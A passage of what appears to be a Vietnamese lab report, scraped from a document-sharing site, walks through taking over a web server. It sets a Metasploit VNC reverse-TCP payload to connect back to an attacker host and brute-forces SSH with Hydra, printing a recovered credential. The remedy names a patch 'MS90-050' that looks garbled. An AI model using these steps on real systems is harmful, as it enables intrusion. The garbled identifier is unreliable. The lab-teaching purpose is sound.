Tải bản đầy đủ - 0 (trang)
b. Cách thức tấn công:

b. Cách thức tấn công:

Tải bản đầy đủ - 0trang

Thiết đặt giá trị RHOST là IP của Web Server, thực hiện lệnh:

set RHOST [IP Web Server]



Ở đây ta dùng payload windows/vncinject/reverse_tcp bằng lệnh:

set payload windows/vncinject/reverse_tcp



27 | P a g e



Tiếp theo ta thiết đặt giá trị LHOST cho payload, là IP attacker (máy chạy Kali)



Cuối cùng ta dùng lệnh exploit để thực thi



28 | P a g e



Kết quả ta chiếm được quyền điều khiển từ xa Web Server



c. Cách phòng chống:

Cập nhật bản vá lỗi MS90-050 cho Windows Server 2008.



29 | P a g e



3. Tấn Công Web Server Bằng Phương Pháp Brute Force Với Công Cụ Hydra

a. Kịch bản tấn cơng:

Victim là một Web Server có sử dụng giao thức SSH để truy cập vào server.

Attacker sử dụng công cụ Hydra trên Kali Linux với list username và list password đã chuẩn bị trước, tiến

hành brute force vào Web Server.

Sau khi brute force thành công, attacker sẽ dùng username và password vừa tìm được truy cập vào Web

Server thông qua SSH chiếm quyền điều khiển Web Server qua dòng lệnh.



b. Cách thức tấn cơng:

Mở cơng cụ Hydra trên Kali Linux bằng dòng lệnh hydra



30 | P a g e



Tiếp theo ta sẽ tiến hành brute force SSH theo câu lệnh:

hydra –L [list username] –P [list password] [IP victim] ssh



Quá trình brute force sẽ được thực hiện, nếu tìm thấy Username và Password của Web Server thì cơng cụ

hydra sẽ hiện lên thơng báo.

Ở đây ta tìm được username là Administrator và password là thaihoa411



31 | P a g e



Tài liệu bạn tìm kiếm đã sẵn sàng tải về

b. Cách thức tấn công:

Tải bản đầy đủ ngay(0 tr)

×